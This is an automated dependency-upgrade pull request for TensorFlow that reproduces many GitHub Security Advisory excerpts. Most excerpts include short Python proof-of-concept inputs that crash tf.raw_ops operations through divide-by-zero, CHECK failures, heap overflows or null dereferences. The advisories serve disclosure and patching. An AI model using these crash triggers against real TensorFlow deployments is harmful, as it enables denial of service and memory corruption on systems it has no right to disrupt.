The tf.raw_ops.Conv3DBackprop* operations fail to validate that the input tensors are not empty. In turn, this would result in a division by 0:

import tensorflow as tf
input_sizes = tf.constant([0, 0, 0, 0, 0], shape=[5], dtype=tf.int32)
filter_tensor = tf.constant([], shape=[0, 0, 0, 1, 0], dtype=tf.float32)
out_backprop = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32)
tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1])

import tensorflow as tf
input_sizes = tf.constant([1], shape=[1, 1, 1, 1, 1], dtype=tf.float32)
filter_tensor = tf.constant([0, 0, 0, 1, 0], shape=[5], dtype=tf.int32)
out_backprop = tf.constant([], shape=[1, 1, 1, 1, 0], dtype=tf.float32)
tf.raw_ops.Conv3DBackpropFilterV2(input=input_sizes, filter_sizes=filter_tensor, out_backprop=out_backprop, strides=[1, 1, 1, 1, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1])

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in QuantizedMul

Impact

An attacker can trigger a division by 0 in tf.raw_ops.QuantizedMul:

import tensorflow as tf
x = tf.zeros([4, 1], dtype=tf.quint8)
y = tf.constant([], dtype=tf.quint8)
min_x = tf.constant(0.0)
max_x = tf.constant(0.0010000000474974513)
min_y = tf.constant(0.0)
max_y = tf.constant(0.0010000000474974513)
tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

This is because the implementation does a division by a quantity that is controlled by the caller:

template 

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

CHECK-fail in tf.raw_ops.EncodePng

Impact

An attacker can trigger a CHECK fail in PNG encoding by providing an empty input tensor as the pixel data:

import tensorflow as tf
image = tf.zeros([0, 0, 3])
image = tf.cast(image, dtype=tf.uint8)
tf.raw_ops.EncodePng(image=image)

This is because the implementation only validates that the total number of pixels in the image does not overflow. Thus, an attacker can send an empty matrix for encoding. However, if the tensor is empty, then the associated buffer is nullptr. Hence, when calling png::WriteImageToBuffer, the first argument (i.e., image.flat().data()) is NULL. This then triggers the CHECK_NOTNULL in the first line of png::WriteImageToBuffer.

template <typename T>
bool WriteImageToBuffer(
    const void* image, int width, int height, int row_bytes, int num_channels,
    int channel_bits, int compression, T* png_string,
    const std::vector<std::pair<std::string, std::string> >* metadata) {
  CHECK_NOTNULL(image);

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Invalid validation in SparseMatrixSparseCholesky

Impact

An attacker can trigger a null pointer dereference by providing an invalid permutation to tf.raw_ops.SparseMatrixSparseCholesky:

import tensorflow as tf
import numpy as np
from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops
indices_array = np.array([[0, 0]])
value_array = np.array([-10.0], dtype=np.float32)
dense_shape = [1, 1]
st = tf.SparseTensor(indices_array, value_array, dense_shape)
input = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix(
st.indices, st.values, st.dense_shape)
permutation = tf.constant([], shape=[1, 0], dtype=tf.int32)
tf.raw_ops.SparseMatrixSparseCholesky(input=input, permutation=permutation, type=tf.float32)

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

CHECK-fail in DrawBoundingBoxes

Impact

An attacker can trigger a denial of service via a CHECK failure by passing an empty image to tf.raw_ops.DrawBoundingBoxes:

import tensorflow as tf
images = tf.fill([53, 0, 48, 1], 0.)
boxes = tf.fill([53, 31, 4], 0.)
boxes = tf.Variable(boxes)
boxes[0, 0, 0].assign(3.90621)
tf.raw_ops.DrawBoundingBoxes(images=images, boxes=boxes)

This is because the implementation uses CHECK_* assertions instead of OP_REQUIRES to validate user controlled inputs. Whereas OP_REQUIRES allows returning an error condition back to the user, the CHECK_* macros result in a crash if the condition is false, similar to assert.

const int64 max_box_row_clamp = std::min(max_box_row, height - 1);
... 
CHECK_GE(max_box_row_clamp, 0);

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap out of bounds read in RaggedCross

Impact

An attacker can force accesses outside the bounds of heap allocated arrays by passing in invalid tensor values to tf.raw_ops.RaggedCross:

import tensorflow as tf
ragged_values = []
ragged_row_splits = []
sparse_indices = []
sparse_values = []
sparse_shape = []
dense_inputs_elem = tf.constant([], shape=[92, 0], dtype=tf.int64)
dense_inputs = [dense_inputs_elem]
input_order = "R"
hashed_output = False
num_buckets = 0
hash_key = 0

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in QuantizedMul

Impact

An attacker can cause a heap buffer overflow in QuantizedMul by passing in invalid thresholds for the quantization:

import tensorflow as tf
x = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8)
y = tf.constant([256, 328], shape=[1, 2], dtype=tf.quint8)
min_x = tf.constant([], dtype=tf.float32)
max_x = tf.constant([], dtype=tf.float32)
min_y = tf.constant([], dtype=tf.float32)
max_y = tf.constant([], dtype=tf.float32)
tf.raw_ops.QuantizedMul(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

This is because the implementation assumes that the 4 arguments are always valid scalars and tries to access the numeric value directly:

const float min_x = context->input(2).flat()(0);

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

CHECK-fail in SparseConcat

Impact

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.SparseConcat:

import tensorflow as tf
import numpy as np
indices_1 = tf.constant([[514, 514], [514, 514]], dtype=tf.int64)
indices_2 = tf.constant([[514, 530], [599, 877]], dtype=tf.int64)
indices = [indices_1, indices_2]
values_1 = tf.zeros([0], dtype=tf.int64)
values_2 = tf.zeros([0], dtype=tf.int64)
values = [values_1, values_2]
shape_1 = tf.constant([442, 514, 514, 515, 606, 347, 943, 61, 2], dtype=tf.int64)
shape_2 = tf.zeros([9], dtype=tf.int64)
shapes = [shape_1, shape_2]
tf.raw_ops.SparseConcat(indices=indices, values=values, shapes=shapes, concat_dim=2)

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in QuantizedResizeBilinear

Impact

An attacker can cause a heap buffer overflow in QuantizedResizeBilinear by passing in invalid thresholds for the quantization:

import tensorflow as tf
images = tf.constant([], shape=[0], dtype=tf.qint32)
size = tf.constant([], shape=[0], dtype=tf.int32)
min = tf.constant([], dtype=tf.float32)
max = tf.constant([], dtype=tf.float32)
tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min, max=max, align_corners=False, half_pixel_centers=False)

This is because the implementation assumes that the 2 arguments are always valid scalars and tries to access the numeric value directly:

const float in_min = context->input(2).flat()(0);
const float in_max = context->input(3).flat()(0);

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in QuantizedReshape

Impact

An attacker can cause a heap buffer overflow in QuantizedReshape by passing in invalid thresholds for the quantization:

import tensorflow as tf
tensor = tf.constant([], dtype=tf.qint32)
shape = tf.constant([], dtype=tf.int32)
input_min = tf.constant([], dtype=tf.float32)
input_max = tf.constant([], dtype=tf.float32)
tf.raw_ops.QuantizedReshape(tensor=tensor, shape=shape, input_min=input_min, input_max=input_max)

This is because the implementation assumes that the 2 arguments are always valid scalars and tries to access the numeric value directly:

const auto& input_min_float_tensor = ctx->input(2);
...
const float input_min_float = input_min_float_tensor.flat()(0);

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by zero in Conv2DBackpropFilter

Impact

An attacker can cause a division by zero to occur in Conv2DBackpropFilter:

import tensorflow as tf
input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32)
out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
tf.raw_ops.Conv2DBackpropFilter(
input=input_tensor,
filter_sizes=filter_sizes,
out_backprop=out_backprop,
strides=[1, 1, 1, 1],
use_cudnn_on_gpu=False,
padding='SAME',
explicit_paddings=[],
data_format='NHWC',
dilations=[1, 1, 1, 1]

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Segfault in tf.raw_ops.ImmutableConst

Impact

Calling tf.raw_ops.ImmutableConst with a dtype of tf.resource or tf.variant results in a segfault in the implementation as code assumes that the tensor contents are pure scalars.

>>> import tensorflow as tf
>>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt")
...
Segmentation fault

Patches

We have patched the issue in 4f663d4b8f0bec1b48da6fa091a7d29609980fa4 and will release TensorFlow 2.5.0 containing the patch. TensorFlow nightly packages after this commit will also have the issue resolved.

Workarounds

If using tf.raw_ops.ImmutableConst in code, you can prevent the segfault by inserting a filter for the dtype argument.
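A minimal sketch of such a filter, assuming a hypothetical wrapper (safe_immutable_const is not a TensorFlow API):

import tensorflow as tf

# Hypothetical wrapper: reject the dtypes known to crash before the raw op
# is ever invoked.
def safe_immutable_const(dtype, shape, memory_region_name):
    if dtype in (tf.resource, tf.variant):
        raise ValueError("ImmutableConst does not support resource/variant dtypes")
    return tf.raw_ops.ImmutableConst(dtype=dtype, shape=shape,
                                     memory_region_name=memory_region_name)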

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in Conv2DBackpropFilter

Impact

An attacker can cause a heap buffer overflow to occur in Conv2DBackpropFilter:

import tensorflow as tf
input_tensor = tf.constant([386.078431372549, 386.07843139643234],
shape=[1, 1, 1, 2], dtype=tf.float32)
filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32)
out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1],
dtype=tf.float32)
tf.raw_ops.Conv2DBackpropFilter(
input=input_tensor,
filter_sizes=filter_sizes,
out_backprop=out_backprop,
strides=[1, 66, 49, 1],
use_cudnn_on_gpu=True,
padding='VALID',
explicit_paddings=[],

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in StringNGrams

Impact

An attacker can cause a heap buffer overflow by passing crafted inputs to tf.raw_ops.StringNGrams:

import tensorflow as tf
separator = b'\x02\x00'
ngram_widths = [7, 6, 11]
left_pad = b'\x7f\x7f\x7f\x7f\x7f'
right_pad = b'\x7f\x7f\x25\x5d\x53\x74'
pad_width = 50
preserve_short_sequences = True
l = ['', '', '', '', '', '', '', '', '', '', '']
data = tf.constant(l, shape=[11], dtype=tf.string)
l2 = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Null pointer dereference in StringNGrams

Impact

An attacker can trigger a dereference of a null pointer in tf.raw_ops.StringNGrams:

import tensorflow as tf
data=tf.constant([''] * 11, shape=[11], dtype=tf.string)
splits = [0]*115
splits.append(3)
data_splits=tf.constant(splits, shape=[116], dtype=tf.int64)
tf.raw_ops.StringNGrams(data=data, data_splits=data_splits, separator=b'Ss',
ngram_widths=[7,6,11],
left_pad='ABCDE', right_pad=b'ZYXWVU',
pad_width=50, preserve_short_sequences=True)

This is because the implementation does not fully validate the data_splits argument. This can result in ngrams_data being a null pointer when the output would be computed to have 0 or negative size.

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

CHECK-fail in CTCGreedyDecoder

Impact

An attacker can trigger a denial of service via a CHECK-fail in tf.raw_ops.CTCGreedyDecoder:

import tensorflow as tf
inputs = tf.constant([], shape=[18, 2, 0], dtype=tf.float32)
sequence_length = tf.constant([-100, 17], shape=[2], dtype=tf.int32)
merge_repeated = False
tf.raw_ops.CTCGreedyDecoder(inputs=inputs, sequence_length=sequence_length, merge_repeated=merge_repeated)

This is because the implementation has a CHECK_LT inserted to validate some invariants. When this condition is false, the program aborts, instead of returning a valid error to the user. This abnormal termination can be weaponized in denial of service attacks.

Patches

We have patched the issue in GitHub commit ea3b43e98c32c97b35d52b4c66f9107452ca8fb2.

The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in SparseTensorToCSRSparseMatrix

Impact

An attacker can trigger a denial of service via a CHECK-fail in converting sparse tensors to CSR Sparse matrices:

import tensorflow as tf
import numpy as np
from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops
indices_array = np.array([[0, 0]])
value_array = np.array([0.0], dtype=np.float32)
dense_shape = [0, 0]
st = tf.SparseTensor(indices_array, value_array, dense_shape)
values_tensor = sparse_csr_matrix_ops.sparse_tensor_to_csr_sparse_matrix(
st.indices, st.values, st.dense_shape)

This is because the implementation does a double redirection to access an element of an array allocated on the heap:

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in QuantizedBiasAdd

Impact

An attacker can trigger an integer division by zero undefined behavior in tf.raw_ops.QuantizedBiasAdd:

import tensorflow as tf
input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8)
bias = tf.constant([], shape=[0], dtype=tf.quint8)
min_input = tf.constant(-10.0, dtype=tf.float32)
max_input = tf.constant(-10.0, dtype=tf.float32)
min_bias = tf.constant(-10.0, dtype=tf.float32)
max_bias = tf.constant(-10.0, dtype=tf.float32)
tf.raw_ops.QuantizedBiasAdd(input=input_tensor, bias=bias, min_input=min_input,
max_input=max_input, min_bias=min_bias,
max_bias=max_bias, out_type=tf.qint32)

This is because the implementation of the Eigen kernel does a division by the number of elements of the smaller input (based on shape) without checking that this is not zero:

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in FractionalAvgPool

Impact

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.FractionalAvgPool:

import tensorflow as tf
value = tf.constant([60], shape=[1, 1, 1, 1], dtype=tf.int32)
pooling_ratio = [1.0, 1.0000014345305555, 1.0, 1.0]
pseudo_random = False
overlapping = False
deterministic = False
seed = 0
seed2 = 0
tf.raw_ops.FractionalAvgPool(
value=value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random,
overlapping=overlapping, deterministic=deterministic, seed=seed, seed2=seed2)

This is because the implementation computes a divisor quantity by dividing two user controlled values:

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap out of bounds in QuantizedBatchNormWithGlobalNormalization

Impact

An attacker can cause a segfault and denial of service via accessing data outside of bounds in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization:

import tensorflow as tf
t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8)
t_min = tf.constant([], shape=[0], dtype=tf.float32)
t_max = tf.constant([], shape=[0], dtype=tf.float32)
m = tf.constant([1], shape=[1], dtype=tf.quint8)
m_min = tf.constant([], shape=[0], dtype=tf.float32)
m_max = tf.constant([], shape=[0], dtype=tf.float32)
v = tf.constant([1], shape=[1], dtype=tf.quint8)
v_min = tf.constant([], shape=[0], dtype=tf.float32)
v_max = tf.constant([], shape=[0], dtype=tf.float32)
beta = tf.constant([1], shape=[1], dtype=tf.quint8)
beta_min = tf.constant([], shape=[0], dtype=tf.float32)
beta_max = tf.constant([], shape=[0], dtype=tf.float32)
gamma = tf.constant([1], shape=[1], dtype=tf.quint8)
gamma_min = tf.constant([], shape=[0], dtype=tf.float32)

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in QuantizedAdd

Impact

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedAdd:

import tensorflow as tf
x = tf.constant([68, 228], shape=[2, 1], dtype=tf.quint8)
y = tf.constant([], shape=[2, 0], dtype=tf.quint8)
min_x = tf.constant(10.723421015884028)
max_x = tf.constant(15.19578006631113)
min_y = tf.constant(-5.539003866682977)
max_y = tf.constant(42.18819949559947)
tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y)

This is because the implementation computes a modulo operation without validating that the divisor is not zero.


... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in QuantizedBatchNormWithGlobalNormalization

Impact

An attacker can cause a runtime division by zero error and denial of service in tf.raw_ops.QuantizedBatchNormWithGlobalNormalization:

import tensorflow as tf
t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8)
t_min = tf.constant(-10.0, dtype=tf.float32)
t_max = tf.constant(-10.0, dtype=tf.float32)
m = tf.constant([], shape=[0], dtype=tf.quint8)
m_min = tf.constant(-10.0, dtype=tf.float32)
m_max = tf.constant(-10.0, dtype=tf.float32)
v = tf.constant([], shape=[0], dtype=tf.quint8)
v_min = tf.constant(-10.0, dtype=tf.float32)
v_max = tf.constant(-10.0, dtype=tf.float32)
beta = tf.constant([], shape=[0], dtype=tf.quint8)
beta_min = tf.constant(-10.0, dtype=tf.float32)
beta_max = tf.constant(-10.0, dtype=tf.float32)
gamma = tf.constant([], shape=[0], dtype=tf.quint8)
gamma_min = tf.constant(-10.0, dtype=tf.float32)

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

CHECK-failure in UnsortedSegmentJoin

Impact

An attacker can cause a denial of service by controlling the values of the num_segments tensor argument for UnsortedSegmentJoin:

import tensorflow as tf
inputs = tf.constant([], dtype=tf.string)
segment_ids = tf.constant([], dtype=tf.int32)
num_segments = tf.constant([], dtype=tf.int32)
separator = ''
tf.raw_ops.UnsortedSegmentJoin(
inputs=inputs, segment_ids=segment_ids,
num_segments=num_segments, separator=separator)

This is because the implementation assumes that the num_segments tensor is a valid scalar:

  const Tensor& num_segments_tensor = context->input(2);

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

OOB read in MatrixTriangularSolve

Impact

The implementation of MatrixTriangularSolve fails to terminate kernel execution if one validation condition fails:

void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0,
                          const Tensor& in1) override {
  OP_REQUIRES(
      ctx, in0.dims() >= 2,
      errors::InvalidArgument("In[0] ndims must be >= 2: ", in0.dims()));
  OP_REQUIRES(
      ctx, in1.dims() >= 2,
      errors::InvalidArgument("In[0] ndims must be >= 2: ", in1.dims()));
}

void Compute(OpKernelContext* ctx) override {
  const Tensor& in0 = ctx->input(0);
  const Tensor& in1 = ctx->input(1);
  ValidateInputTensors(ctx, in0, in1);

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Division by 0 in FusedBatchNorm

Impact

An attacker can cause a denial of service via a FPE runtime error in tf.raw_ops.FusedBatchNorm:

import tensorflow as tf
x = tf.constant([], shape=[1, 1, 1, 0], dtype=tf.float32)
scale = tf.constant([], shape=[0], dtype=tf.float32)
offset = tf.constant([], shape=[0], dtype=tf.float32)
mean = tf.constant([], shape=[0], dtype=tf.float32)
variance = tf.constant([], shape=[0], dtype=tf.float32)
epsilon = 0.0
exponential_avg_factor = 0.0
data_format = "NHWC"
is_training = False
tf.raw_ops.FusedBatchNorm(
x=x, scale=scale, offset=offset, mean=mean,
variance=variance, epsilon=epsilon,
exponential_avg_factor=exponential_avg_factor,

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap OOB in QuantizeAndDequantizeV3

Impact

An attacker can read data outside of bounds of heap allocated buffer in tf.raw_ops.QuantizeAndDequantizeV3:

import tensorflow as tf
tf.raw_ops.QuantizeAndDequantizeV3(
input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30],
signed_input=False, range_given=False, narrow_range=False, axis=3)

This is because the implementation does not validate the value of user supplied axis attribute before using it to index in the array backing the input argument:

const int depth = (axis_ == -1) ? 1 : input.dim_size(axis_);

Patches

We have patched the issue in GitHub commit 99085e8ff02c3763a0ec2263e44daec416f6a387.

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Incomplete validation in SparseAdd

Impact

Incomplete validation in SparseAdd allows attackers to trigger undefined behavior (dereferencing null pointers) as well as writes outside the bounds of heap-allocated data:

import tensorflow as tf
a_indices = tf.zeros([10, 97], dtype=tf.int64)
a_values = tf.zeros([10], dtype=tf.int64)
a_shape = tf.zeros([0], dtype=tf.int64)
b_indices = tf.zeros([0, 0], dtype=tf.int64)
b_values = tf.zeros([0], dtype=tf.int64)
b_shape = tf.zeros([0], dtype=tf.int64)
thresh = 0
tf.raw_ops.SparseAdd(a_indices=a_indices,
a_values=a_values,
a_shape=a_shape,
b_indices=b_indices,

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow and undefined behavior in FusedBatchNorm

Impact

The implementation of tf.raw_ops.FusedBatchNorm is vulnerable to a heap buffer overflow:

import tensorflow as tf
x = tf.zeros([10, 10, 10, 6], dtype=tf.float32)
scale = tf.constant([0.0], shape=[1], dtype=tf.float32)
offset = tf.constant([0.0], shape=[1], dtype=tf.float32)
mean = tf.constant([0.0], shape=[1], dtype=tf.float32)
variance = tf.constant([0.0], shape=[1], dtype=tf.float32)
epsilon = 0.0
exponential_avg_factor = 0.0
data_format = "NHWC"
is_training = False
tf.raw_ops.FusedBatchNorm(
x=x, scale=scale, offset=offset, mean=mean, variance=variance,
epsilon=epsilon, exponential_avg_factor=exponential_avg_factor,
data_format=data_format, is_training=is_training)

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in MaxPoolGrad

Impact

The implementation of tf.raw_ops.MaxPoolGrad is vulnerable to a heap buffer overflow:

import tensorflow as tf
orig_input = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32)
orig_output = tf.constant([0.0], shape=[1, 1, 1, 1], dtype=tf.float32)
grad = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32)
ksize = [1, 1, 1, 1]
strides = [1, 1, 1, 1]
padding = "SAME"
tf.raw_ops.MaxPoolGrad(
orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize,
strides=strides, padding=padding, explicit_paddings=[])

The implementation fails to validate that indices used to access elements of input/output arrays are valid:

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in FractionalAvgPoolGrad

Impact

The implementation of tf.raw_ops.FractionalAvgPoolGrad is vulnerable to a heap buffer overflow:

import tensorflow as tf
orig_input_tensor_shape = tf.constant([1, 3, 2, 3], shape=[4], dtype=tf.int64)
out_backprop = tf.constant([2], shape=[1, 1, 1, 1], dtype=tf.int64)
row_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64)
col_pooling_sequence = tf.constant([1], shape=[1], dtype=tf.int64)
tf.raw_ops.FractionalAvgPoolGrad(
orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop,
row_pooling_sequence=row_pooling_sequence,
col_pooling_sequence=col_pooling_sequence, overlapping=False)

The implementation fails to validate that the pooling sequence arguments have as many elements as required by the out_backprop tensor shape.

... (truncated)

Affected versions: < 2.1.4

Sourced from The GitHub Security Advisory Database.

Heap buffer overflow in AvgPool3DGrad

Impact

The implementation of tf.raw_ops.AvgPool3DGrad is vulnerable to a heap buffer overflow:

import tensorflow as tf
orig_input_shape = tf.constant([10, 6, 3, 7, 7], shape=[5], dtype=tf.int32)
grad = tf.constant([0.01, 0, 0], shape=[3, 1, 1, 1, 1], dtype=tf.float32)
ksize = [1, 1, 1, 1, 1]
strides = [1, 1, 1, 1, 1]
padding = "SAME"
tf.raw_ops.AvgPool3DGrad(
orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides,
padding=padding)

The implementation assumes that the orig_input_shape and grad tensors have similar first and last dimensions but does not validate this assumption.

Patches

... (truncated)

Affected versions: < 2.1.4


Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot merge will merge this PR after your CI passes on it
  • @dependabot squash and merge will squash and merge this PR after your CI passes on it
  • @dependabot cancel merge will cancel a previously requested merge and block automerging
  • @dependabot reopen will reopen this PR if it is closed
  • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
  • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
  • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
  • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
  • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language
  • @dependabot badge me will comment on this PR with code to add a "Dependabot enabled" badge to your readme

Additionally, you can set the following in your Dependabot dashboard:

  • Update frequency (including time of day and day of week)
  • Pull request limits (per update run and/or open at any time)
  • Out-of-range updates (receive only lockfile updates, if desired)
  • Security updates (receive only security updates, if desired)
